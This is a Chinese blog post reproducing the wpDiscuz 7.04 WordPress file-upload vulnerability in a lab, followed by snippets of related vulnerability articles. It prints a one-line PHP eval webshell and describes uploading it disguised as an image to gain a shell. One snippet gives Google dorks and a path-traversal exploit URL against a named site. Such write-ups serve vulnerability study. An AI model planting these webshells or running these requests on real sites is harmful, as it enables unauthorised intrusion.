WordPress评论插件wpDiscuz(7.04版本)上传漏洞

最新推荐文章于 2025-04-18 15:04:47 发布
最新推荐文章于 2025-04-18 15:04:47 发布
阅读量843 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 渗透测试 上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39421693/article/details/107701606
版权

WordPress评论插件wpDiscuz(7.04版本)上传漏洞

1)影响版本:<7.05

2)发现:

Wordfence Team发现该漏洞,插件只检查文件“Magic Number”,不检查文件扩展名。

3)复现环境:phpstudy+WordPress 5.4.2+wpDiscuz7.04

4)漏洞原理:(借用freebuf图片)

5)复现过程:

构造一句话木马:  <?php @eval($_POST['attack']) ?>

 

生成木马图片:修改后缀名为 .php

上传木马图片:

上传成功:

连接webshell:使用蚁剑连接,成功拿到shell!

wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5675
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
(环境搭建+复现) Wordpress评论插件wpDiscuz任意文件上传漏洞
daxi0ng的博客
09-25 952
0x00 简介 wpDiscuzWordPress评论插件。创新,现代且功能丰富的评论系统,可充实您的网站评论部分。 0x01 漏洞概述 Wordfence的威胁情报团队在一款名叫wpDiscuzWordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了。这个漏洞将允许未经认证的攻击者在目标站点中上传任意文件,其中也包括PHP文件,该漏洞甚至还允许攻击者在目标站点的服务器中实现远程代码执行。 0x02 影响版本 wpDiscuz7.0.0– ...
wordpress 垂直越权(CVE=2021-21389)漏洞复现详细教程
最新发布
hp.puppy的博客
04-18 2143
wordpress 垂直越权(CVE=2021-21389)漏洞复现详细教程 wordpress 注册绕过 wordpress 提权admin wordpress 文件上传
wordpress漏洞_漏洞分析丨WordPress评论插件wpDiscuz任意文件上传
weixin_39889481的博客
12-04 318
本文共791字,预计阅读时间4分钟首发于『先知社区』在T00ls上看到一个老哥WordPress站点被搞了,下载了Access日志分析了一下,发现攻击路径是先访问了一个页面,然后访问/wp-admin/admin-ajax.php?action=wmuUploadFiles后直接就Shell落地了,确定是这个模块有问题了,后来说是wpDiscuz评论插件漏洞,看了下官网V...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2646
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
wordpress4.9漏洞
小小猪的博客
12-01 8729
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
BusHound 7.04版本 串口监控软件
10-29
7.04版本是该软件的一个更新迭代,旨在提供更稳定、更高效的串口监控功能,帮助开发者和测试工程师深入理解串口通信过程,诊断和解决相关问题。 在串口监控领域,BusHound具有以下主要特点: 1. **实时数据捕获**...
Bus Hound version 7.04,含序列号
10-11
Bus Hound版本7.04相较于之前的版本,做了许多改进和优化。它提供了对新一代硬件接口的更好支持,如USB 3.0等,同时增强了数据捕获的准确性和效率。该版本还可能包括对新操作系统版本的兼容性更新,确保开发者能够在...
爱思助手7.04版本功能解析:越狱与刷机新体验
标题《爱思助手7.04》指的是最新版本的iOS设备管理工具“爱思助手”。爱思助手是一款专为iOS用户提供的一体化软件,它将越狱、刷机、备份等功能集于一身,为苹果设备的管理提供了极大的便利。爱思助手的操作简单、...
BUS HOUND 7.04
06-27
BUS HOUND 7.04
Total Commander 7.04a版本更新深度体验
Total Commander 7.04a 是该软件的一个较早的版本,它通过提供众多实用功能,使得文件和文件夹的管理变得高效和直观。以下是根据提供的信息总结的知识点: ### Total Commander 7.04a 特点与功能 #### 1. 多语言...
WordPress wp-trackback.php漏洞分析
03-03
本文对WordPress wp-trackback.php漏洞作了分析。
WordPress 文件下载漏洞
深蓝旭的博客
08-23 1023
Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php" exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php google dork: inurl:"/wp-content/themes/newspro2891/download.ph...
插件漏洞导致 60 万个 WordPress 网站遭受攻击
网络研究观
11-16 4973
建议所有使用该插件的用户尽快升级到最新版本
wordpress漏洞_wordpress评论插件wpDiscuz任意文件上传漏洞分析
weixin_39765796的博客
12-04 407
更多全球网络安全资讯尽在邑安全前言在t00ls上看到一个老哥wordpress站点被搞了,下载了access日志分析了一下,发现攻击路径是先访问了一个页面,然后访问 /wp-admin/admin-ajax.php?action=wmuUploadFiles 后直接就shell落地了,确定是这个模块有问题了;后来说是wpdiscuz评论插件漏洞,看了下官网V7.0.5修复了一次安全漏洞...
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2578
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
WordPress 未授权本地文件包含漏洞(CVE-2025-2294)
m0_50125527的博客
04-03 129
Kubio AI Page Builder 是 WordPress 平台上一款基于人工智能的现代化建站工具,专为无代码用户和开发者设计。该插件深度融合 AI 生成技术,提供拖拽式可视化编辑器,支持智能布局建议、实时内容生成和自动化设计优化,用户可通过自然语言指令快速生成响应式网页、区块模板和动态内容。
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
2301_80127209的博客
06-18 938
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
漏洞复现】WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)
qq_67810151的博客
03-27 709
WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值